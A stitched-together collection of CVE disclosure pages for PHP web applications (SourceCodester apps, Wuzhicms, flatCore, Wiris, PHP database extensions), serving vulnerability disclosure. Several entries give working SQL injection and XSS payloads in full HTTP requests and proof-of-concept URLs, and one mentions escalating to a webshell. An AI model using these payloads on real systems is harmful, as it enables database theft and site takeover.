Student Registration and Fee Payment System v1.0 is vulnerable to SQL Injection via /scms/student.php.

Permalink

Cannot retrieve contributors at this time

**student-registration-and-fee-payment-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15355/student-registration-and-fee-payment-system-php-mysql.html

Date: 2022-05-07

Vulnerability File: /scms/student.php

Vulnerability location:/scms/student.php, id

\[+\] Payload: 5'and(select\*from(select+sleep(3))a/**/union/**/select+1)='

Tested on Windows 10, XAMPP

    GET http://192.168.2.102/scms/student.php?action=delete&id=5'and(select*from(select+sleep(3))a/**/union/**/select+1)=' HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Connection: close
    Referer: http://192.168.2.102/scms/student.php?act=2
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    Upgrade-Insecure-Requests: 1

CVE-2022-31908: 0525/sql.md at main · mikeccltt/0525

Online Discussion Forum Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /odfs/classes/Master.php?f=save_category, name.

Permalink

**online-discussion-forum-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /odfs/classes/Master.php

Vulnerability location: /odfs/classes/Master.php?f=save\_category, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/odfs/classes/Master.php?f=save_category HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------1173846977850966238533383019
    Content-Length: 743
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/odfs/admin/?page=categories
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="id"
    
    3
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="description"
    
    Python is a high-level, interpreted, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. Python is dynamically-typed and garbage-collected.
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------1173846977850966238533383019--

CVE-2022-31913: 0525/xss.md at main · mikeccltt/0525

Online Tutor Portal Site v1.0 is vulnerable to SQL Injection via /otps/classes/Master.php?f=delete_team.

Permalink

Cannot retrieve contributors at this time

**online-tutor-portal-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15339/online-tutor-portal-site-phpopp-free-source-code.html

Date: 2022-05-07

Vulnerability File: /otps/classes/Master.php?f=delete\_team

Vulnerability location:/otps/classes/Master.php?f=delete\_course, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/otps/classes/Master.php?f=delete_course HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/otps/admin/?page=courses
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-31912: 0525/sql.md at main · mikeccltt/0525

Online Discussion Forum Site v1.0 is vulnerable to SQL Injection via /odfs/classes/Master.php?f=delete_team.

Permalink

Cannot retrieve contributors at this time

**online-discussion-forum-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /odfs/classes/Master.php?f=delete\_team

Vulnerability location:/odfs/classes/Master.php?f=delete\_category, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/odfs/classes/Master.php?f=delete_category HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/odfs/admin/?page=categories
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-31911: 0525/sql.md at main · mikeccltt/0525

Online Tutor Portal Site v1.0 is vulnerable to Cross Site Scripting (XSS). via /otps/classes/Master.php.

Permalink

Cannot retrieve contributors at this time

**online-tutor-portal-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15339/online-tutor-portal-site-phpopp-free-source-code.html

Date: 2022-05-07

Vulnerability File: /otps/classes/Master.php

Vulnerability location: /otps/classes/Master.php?f=save\_course, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/otps/classes/Master.php?f=save_course HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------23528694527160792041879147157
    Content-Length: 940
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/otps/admin/?page=courses
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="tutor_id"
    
    4
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="description"
    
    Sample Course 102
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="experience"
    
    5
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="status"
    
    0
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------23528694527160792041879147157--

CVE-2022-31910: 0525/xss.md at main · mikeccltt/0525

Wiris Mathtype v7.28.0 was discovered to contain a path traversal vulnerability in the resourceFile parameter. This vulnerability is exploited via a crafted request to the resource handler.

@@ -1,10 +1,9 @@ <?php  
class com\_wiris\_util\_json\_JSon extends com\_wiris\_util\_json\_StringParser { class com\_wiris\_util\_json\_JSon { public function \_\_construct() { if(!php\_Boot::$skip\_constructor) { parent::\_\_construct(); }} ; } public function newLine($depth, $sb) { $sb\->add("\\x0D\\x0A"); $i = null; @@ -21,195 +20,6 @@ public function newLine($depth, $sb) { public function setAddNewLines($addNewLines) { $this\->addNewLines = $addNewLines; } public function decodeArray() { $v = new \_hx\_array(array()); $this\->nextToken(); $this\->skipBlanks(); if($this\->c === 93) { $this\->nextToken(); return $v; } while($this\->c !== 93) { $o = $this\->localDecode(); $v\->push($o); $this\->skipBlanks(); if($this\->c === 44) { $this\->nextToken(); $this\->skipBlanks(); } else { if($this\->c !== 93) { throw new HException("Expected ',' or '\]'."); } } unset($o); } $this\->nextToken(); return $v; } public function decodeHash() { $h = new Hash(); $this\->nextToken(); $this\->skipBlanks(); if($this\->c === 125) { $this\->nextToken(); return $h; } while($this\->c !== 125) { $key = $this\->decodeString(); $this\->skipBlanks(); if($this\->c !== 58) { throw new HException("Expected ':'."); } $this\->nextToken(); $this\->skipBlanks(); $o = $this\->localDecode(); $h\->set($key, $o); $this\->skipBlanks(); if($this\->c === 44) { $this\->nextToken(); $this\->skipBlanks(); } else { if($this\->c !== 125) { throw new HException("Expected ',' or '}'. " . $this\->getPositionRepresentation()); } } unset($o,$key); } $this\->nextToken(); return $h; } public function decodeNumber() { $sb = new StringBuf(); $hex = false; $floating = false; do { $sb\->add(com\_wiris\_util\_json\_JSon\_0($this, $floating, $hex, $sb)); $this\->nextToken(); if($this\->c === 120) { $hex = true; $sb\->add(com\_wiris\_util\_json\_JSon\_1($this, $floating, $hex, $sb)); $this\->nextToken(); } if($this\->c === 46 || $this\->c === 69 || $this\->c === 101) { $floating = true; } } while($this\->c >= 48 && $this\->c <= 58 || $hex && $this\->isHexDigit($this\->c) || $floating && ($this\->c === 46 || $this\->c === 69 || $this\->c === 101 || $this\->c === 43 || $this\->c === 45)); if($floating) { return Std::parseFloat($sb\->b); } else { return Std::parseInt($sb\->b); } } public function decodeString() { $sb = new StringBuf(); $d = $this\->c; $this\->nextToken(); while($this\->c !== $d) { if($this\->c === 92) { $this\->nextToken(); if($this\->c === 110) { $sb\->add("\\x0A"); } else { if($this\->c === 114) { $sb\->add("\\x0D"); } else { if($this\->c === 34) { $sb\->add("\\""); } else { if($this\->c === 39) { $sb\->add("'"); } else { if($this\->c === 116) { $sb\->add("\\x09"); } else { if($this\->c === 92) { $sb\->add("\\\\"); } else { if($this\->c === 117) { $this\->nextToken(); $code = com\_wiris\_util\_json\_JSon\_2($this, $d, $sb); $this\->nextToken(); $code .= com\_wiris\_util\_json\_JSon\_3($this, $code, $d, $sb); $this\->nextToken(); $code .= com\_wiris\_util\_json\_JSon\_4($this, $code, $d, $sb); $this\->nextToken(); $code .= com\_wiris\_util\_json\_JSon\_5($this, $code, $d, $sb); $dec = Std::parseInt("0x" . $code); $sb\->add(com\_wiris\_util\_json\_JSon\_6($this, $code, $d, $dec, $sb)); unset($dec,$code); } else { throw new HException("Unknown scape sequence '\\\\" . com\_wiris\_util\_json\_JSon\_7($this, $d, $sb) . "'"); } } } } } } } } else { $sb\->add(com\_wiris\_util\_json\_JSon\_8($this, $d, $sb)); } $this\->nextToken(); } $this\->nextToken(); return $sb\->b; } public function decodeBooleanOrNull() { $sb = new StringBuf(); while(com\_wiris\_util\_xml\_WCharacterBase::isLetter($this\->c)) { $sb\->b .= chr($this\->c); $this\->nextToken(); } $word = $sb\->b; if($word === "true") { return true; } else { if($word === "false") { return false; } else { if($word === "null") { return null; } else { throw new HException("Unrecognized keyword \\"" . $word . "\\"."); } } } } public function localDecode() { $this\->skipBlanks(); if($this\->c === 123) { return $this\->decodeHash(); } else { if($this\->c === 91) { return $this\->decodeArray(); } else { if($this\->c === 34) { return $this\->decodeString(); } else { if($this\->c === 39) { return $this\->decodeString(); } else { if($this\->c === 45 || $this\->c >= 48 && $this\->c <= 58) { return $this\->decodeNumber(); } else { if($this\->c === 116 || $this\->c === 102 || $this\->c === 110) { return $this\->decodeBooleanOrNull(); } else { throw new HException("Unrecognized char " . \_hx\_string\_rec($this\->c, "")); } } } } } } } public function localDecodeString($str) { $this\->init($str); return $this\->localDecode(); } public function encodeIntegerFormat($sb, $i) { $sb\->add($i\->toString()); } public function encodeLong($sb, $i) { $sb\->add("" . Std::string($i)); } @@ -361,17 +171,13 @@ public function encodeImpl($sb, $o) { if(Std::is($o, \_hx\_qtype("haxe.Int64"))) { $this\->encodeLong($sb, $o); } else { if(Std::is($o, \_hx\_qtype("com.wiris.util.json.JSonIntegerFormat"))) { $this\->encodeIntegerFormat($sb, $o); if(com\_wiris\_system\_TypeTools::isBool($o)) { $this\->encodeBoolean($sb, com\_wiris\_system\_TypeTools::toBool($o)); } else { if(Std::is($o, \_hx\_qtype("Bool"))) { $this\->encodeBoolean($sb, $o); if(Std::is($o, \_hx\_qtype("Float"))) { $this\->encodeFloat($sb, $o); } else { if(Std::is($o, \_hx\_qtype("Float"))) { $this\->encodeFloat($sb, $o); } else { throw new HException("Impossible to convert to json object of type " . Std::string(Type::getClass($o))); } throw new HException("Impossible to convert to json object of type " . Std::string(Type::getClass($o))); } } } @@ -403,15 +209,19 @@ public function \_\_call($m, $a) { else throw new HException('Unable to call «'.$m.'»'); } static function sb() { $»args = func\_get\_args(); return call\_user\_func\_array(self::$sb, $»args); } static $sb; static function encode($o) { $js = new com\_wiris\_util\_json\_JSon(); return $js\->encodeObject($o); } static function decode($str) { $json = new com\_wiris\_util\_json\_JSon(); return $json\->localDecodeString($str); try { return com\_wiris\_util\_json\_parser\_JsonParse::parse($str); }catch(Exception $»e) { $\_ex\_ = ($»e instanceof HException) ? $»e\->e : $»e; if(($e = $\_ex\_) instanceof com\_wiris\_system\_Exception){ throw new HException($e\->getMessage()); } else throw $»e;; } } static function getDepth($o) { if(com\_wiris\_system\_TypeTools::isHash($o)) { @@ -502,66 +312,3 @@ static function isJson($json) { } function \_\_toString() { return 'com.wiris.util.json.JSon'; } } function com\_wiris\_util\_json\_JSon\_0(&$»this, &$floating, &$hex, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_1(&$»this, &$floating, &$hex, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_2(&$»this, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_3(&$»this, &$code, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_4(&$»this, &$code, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_5(&$»this, &$code, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_6(&$»this, &$code, &$d, &$dec, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($dec); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_7(&$»this, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_8(&$»this, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } }

CVE-2022-31372: chore: update PHP integration to 7.28.1 · wiris/moodle-filter_wiris@037ce9c

SQL injection vulnerabilities exist in Wuzhicms v4.1.0 which allows attackers to execute arbitrary SQL commands via the $keyValue parameter in /coreframe/app/pay/admin/index.php

**There are 3 SQL injections in Wuzhicms v4.1.0 background****one****Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:**

/coreframe/app/pay/admin/index.php 30-98

	public function listing(){
		$fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
		$keytype = isset($GLOBALS\['keytype'\]) ? intval($GLOBALS\['keytype'\]) : 0;
		$payments = $this\->payments;
		$status\_arr = $this\->status\_arr;
		$page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
		$page = max($page, 1);
		$status = $GLOBALS\['status'\];

		if ($status) {
			$where = 'status=' . $status;
		} else {
			$where = 'status>0';
		}
		if ($keytype) {
			$where .= " AND \`keytype\`='$keytype'";
		}
		$keyValue = strip\_tags($GLOBALS\['keyValue'\]);
		$fieldtype = intval($GLOBALS\['fieldtype'\]);
		if ($keyValue) {
			switch ($fieldtype) {
				case 0:
					$where .= " AND \`order\_no\`='$keyValue'";
					break;
				case 1:
					$where .= " AND \`telephone\`='$keyValue'";
					break;
				case 2:
					$where .= " AND \`kf\_username\`='$keyValue'";
					break;
				case 3:
					$where .= " AND \`jxs\_username\`='$keyValue'";
					break;
			}
		}

		if ($\_SESSION\['role'\] == 4) {
			//客服
			$kf\_username = get\_cookie('username');
			$where .= " AND \`kf\_username\`='$kf\_username'";
		}
		$starttime = '';
		$endtime = '';
		if ($GLOBALS\['starttime'\]) {
			$starttime = strtotime($GLOBALS\['starttime'\]);
			$where .= " AND \`addtime\`>'$starttime'";
		}
		if ($GLOBALS\['endtime'\]) {
			$endtime = strtotime($GLOBALS\['endtime'\]);
			$where .= " AND \`endtime\`<'$endtime'";
		}
		if(isset($GLOBALS\['exp'\])) {
			$pagesize = 1000;
		} else {
			$pagesize = 20;
		}

		$admin\_result = $this\->db\->get\_list('admin', array('role' => 4), '\*', 0, 20, 0);
		$result = $this\->db\->get\_list('pay', $where, '\*', 0, $pagesize, $page, 'id DESC');
		if(isset($GLOBALS\['exp'\])) {
			$this\->export\_excel($result);
		}
		$pages = $this\->db\->pages;
		$total = $this\->db\->number;
		$pay\_config = get\_config('pay\_config');
		load\_class('form');

		include $this\->template('listing');
	}

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    /index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
    

**two**

The second SQL injection and the first SQL injection are in a different function in the same file!

**Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:**

/coreframe/app/pay/admin/index.php 244-289

public function relay(){
		$id = intval($GLOBALS\['id'\]);
		$r = $this\->db\->get\_one('pay', array('id' => $id));
		$r2 = $this\->db\->get\_one('pay\_detail', array('id' => $id));
		$r = array\_merge($r, $r2);
		$keyValue = '';
		$keyType = '';
		if (isset($GLOBALS\['keyType'\])) {
			$keyType = $GLOBALS\['keyType'\];
			$keyValue = $GLOBALS\['keyValue'\];
			if ($keyValue) {
				$where = "modelid=11 AND \`$keyType\` LIKE '%$keyValue%'";
				$result = $this\->db\->get\_list('member', $where, '\*', 0, 20, 0, 'uid DESC');
			}
		} elseif (isset($GLOBALS\['submit'\])) {
			load\_function('common', 'pay');
			$formdata = array();
			$formdata\['order\_no'\] = create\_order\_no();
			$formdata\['to\_uid'\] = intval($GLOBALS\['to\_uid'\]);
			$formdata\['username'\] = $r\['linkman'\];
			$formdata\['mobile'\] = $r\['telephone'\];
			$formdata\['pinpai'\] = $r\['data1'\];
			$formdata\['chexing'\] = $r\['data3'\];
			$formdata\['addtime'\] = $r\['addtime'\];
			$formdata\['keytype'\] = 0;//游客订单
			$formdata\['zftime'\] = SYS\_TIME;
			$this\->db\->insert('demand\_relay', $formdata);
			$formdata2 = array();
			$formdata2\['op\_uid'\] = $\_SESSION\['uid'\];
			$formdata2\['to\_uid'\] = intval($GLOBALS\['to\_uid'\]);
			$formdata2\['to\_username'\] = $GLOBALS\['to\_username'\];
			$formdata2\['updatetime'\] = SYS\_TIME;
			$this\->db\->insert('demand\_history', $formdata2);
			// $this->db->update('demand', array('flag'=>1),array('did' => $did));
			$this\->db\->update('pay', array('jxs\_username' => $formdata2\['to\_username'\]), array('id' => $id));
			$forward = strip\_tags($GLOBALS\['forward'\]);
			MSG('发送成功', $forward);
		} else {
			$uid = $\_SESSION\['uid'\];
			$where = "op\_uid='$uid'";
			$data = $this\->db\->get\_one('demand\_history', $where, '\*', 0, 'hid DESC');
			$forward = strip\_tags($GLOBALS\['forward'\]);

		}
		include $this\->template('pay\_relay');
	}

Set $keyType=uid  and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    /index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
    

**three****Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability**

Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!

**Vulnerability file:**

coreframe/app/order/admin/index.php 22-87

public function listing() {
    load\_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS\['flag'\];
    $status = array();
    $status\[1\] = '待发货';
    $status\[2\] = '已发货';
    $status\[3\] = '订单完成';

    $status\_arr = $this\->status\_arr;
    $page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
    $page = max($page,1);
    $keyValue = strip\_tags($GLOBALS\['keyValue'\]);
    $fieldtype = intval($GLOBALS\['fieldtype'\]);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND \`order\_no\`='$keyValue'";
                break;
            case 1:
                $where .= " AND \`remark\` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this\->db\->get\_one('member', array('username' => $keyValue));
                $uid = $r\['uid'\];
                $where .= " AND \`uid\`='$uid'";
                break;
            case 3:
                $where .= " AND \`snid\`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag\==0 || $flag) $where .=" AND \`status\`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS\['starttime'\]) {
        $starttime = strtotime($GLOBALS\['starttime'\]);
        $where .= " AND \`addtime\`>'$starttime'";
    }
    if($GLOBALS\['endtime'\]) {
        $endtime = strtotime($GLOBALS\['endtime'\]);
        $where .= " AND \`addtime\`<'$endtime'";
    }
    $result\_arr = $this\->db\->get\_list('order\_point', $where, '\*', 0, 20,$page,'orderid DESC');

Set $fieldtype\=1 and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1
    

    Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
    Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.
    

    https://github.com/wuzhicms/wuzhicms/issues/198
    
    

    Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)
    
    Use sql injection to elevate permissions and write webshell
    Individual

CVE-2021-41654: There are 3 SQL injections in Wuzhicms v4.1.0 background · Issue #198 · wuzhicms/wuzhicms

flatCore-CMS v2.0.8 has a code execution vulnerability, which could let a remote malicious user execute arbitrary PHP code.

**Describe the bug**  
Code execution vulnerabilities in the background

**To Reproduce**  
Steps to reproduce the behavior:  
1.Log in to the background  
2.Go to /acp/acp.php?tn=pages&sub=new#position  
3.Click info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code  
4.Click save  
5./content/cache/active\_urls.php and /content/cache/cache\_lastedit.php files will be inserted with malicious code  
6.Visit the homepage and you will see that the malicious code we inserted was successfully executed and returned the result

**Screenshots**

Click Save New Page

/content/cache/active\_urls.php and /content/cache/cache\_lastedit.php files will be inserted with malicious code

**Desktop (please complete the following information):**

*   OS: MacOS
*   Browser All
*   Version Last version

CVE-2021-41402: Code execution vulnerabilities in the background · Issue #59 · flatCore/flatCore-CMS

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.

CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when using Postgres database extension, supplying invalid parameters to the parametrized query may lead to PHP attempting to free memory using uninitialized data as pointers. This could lead to RCE vulnerability or denial of service.

Sec Bug #81720

Uninitialized array in pg\_query\_params() leading to RCE

Submitted:

2022-05-16 14:50 UTC

Modified:

2022-06-06 07:13 UTC

From:

c dot fol at ambionics dot io

Assigned:

stas (profile)

Status:

Closed

Package:

PostgreSQL related

PHP Version:

8.1.6

OS:

Private report:

No

CVE-ID:

2022-31625

 **\[2022-05-16 14:50 UTC\] c dot fol at ambionics dot io**

Description:
------------
Hello PHP team,

in PHP\_FUNCTION(pg\_query\_params), the array meant to store the char\* representation of the query parameters is allocated on the heap, but not cleared:

\`\`\`
params = (char \*\*)safe\_emalloc(sizeof(char \*), num\_params, 0);
\`\`\`

If a conversion error happens (for instance, one of the params is an object), \`\_php\_pgsql\_free\_params()\` gets called \*on the whole array\*. Since the array is not initialized, a lingering value from a previous request can get freed, leading in the end to remote code execution.

To patch, use calloc or memset-0 it.

There are other functions where you use basically the same code (if cannot convert to string, then free all params) so it might be worth a look.

Patch: 

\`\`\`
- \_php\_pgsql\_free\_params(params, num\_params);
+ \_php\_pgsql\_free\_params(params, i);
\`\`\`

Best regards,
Charles Fol
ambionics.io


Test script:
---------------
<?php

$strings = \[\];

function uenc($v)
{
    $out = '';
    for($i=0; $i<strlen($v);$i++)
    {
        $out .= '\\u' . '00' . str\_pad(dechex(ord($v\[$i\])), 2, '0', STR\_PAD\_LEFT);
    }
    return '"' . $out . '"';
}

$json = 
    '{"a": 1, "args":\[
        "A","A","A",
        {}
    \]}'
;
$c = pg\_connect('host=172.17.0.3 user=postgres password=password');

$data = json\_decode($json);

$resultXXX = pg\_query\_params($c, 'SELECT \* FROM test WHERE x NOT IN ($1)', $data->args);
// var\_dump(pg\_fetch\_all($resultXXX));

Expected result:
----------------
No crash.

Actual result:
--------------
Crash.

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2022-05-17 09:45 UTC\] cmb@php.net**

\-Status: Open +Status: Verified \-Assigned To: +Assigned To: cmb

 **\[2022-05-17 09:45 UTC\] cmb@php.net**

Thanks for reporting!  I can confirm the issue.  I'll have a
closer look.

 **\[2022-05-17 11:17 UTC\] c dot fol at ambionics dot io**

Cool !

I'm wondering if you also got the previous bug, #81719, related to PDO. I didn't receive a confirmation email.

 **\[2022-05-17 11:35 UTC\] cmb@php.net**

\-Assigned To: cmb +Assigned To: stas

 **\[2022-05-17 11:35 UTC\] cmb@php.net**

Proposed patch:
<https://gist.github.com/cmb69/b2b5ab0cb54a5683fe3aff4c7c09f7c2\>.

While fixing this issue, I noticed that pg\_send\_execute() tries to
convert the $params elements to string, but checks the wrong
variable (\`tmp\` instead of \`tmp\_str\`), what may cause a segfault.
The patch also fixes this.

As to whether this is actually a security issue: any potential
exploit requires the script to pass values which are not coercible
to string to the $params parameter of \`pg\_query\_params()\` or
\`pg\_send\_execute()\`.  That might be regarded as sloppy userland
programming, so I'm not sure if we classify this as security
issue.  On the other hand, the documentation is not explicit about
this conversion to string requirement (although the placeholders
hint at it).

Stas, what do you think?

> I'm wondering if you also got the previous bug, #81719, related
> to PDO.

I'll have a look at that right away.

 **\[2022-05-25 21:36 UTC\] stas@php.net**

\-CVE-ID: needed +CVE-ID: 2022-31625

 **\[2022-06-06 07:13 UTC\] git@php.net**

\-Status: Verified +Status: Closed

Tag

#php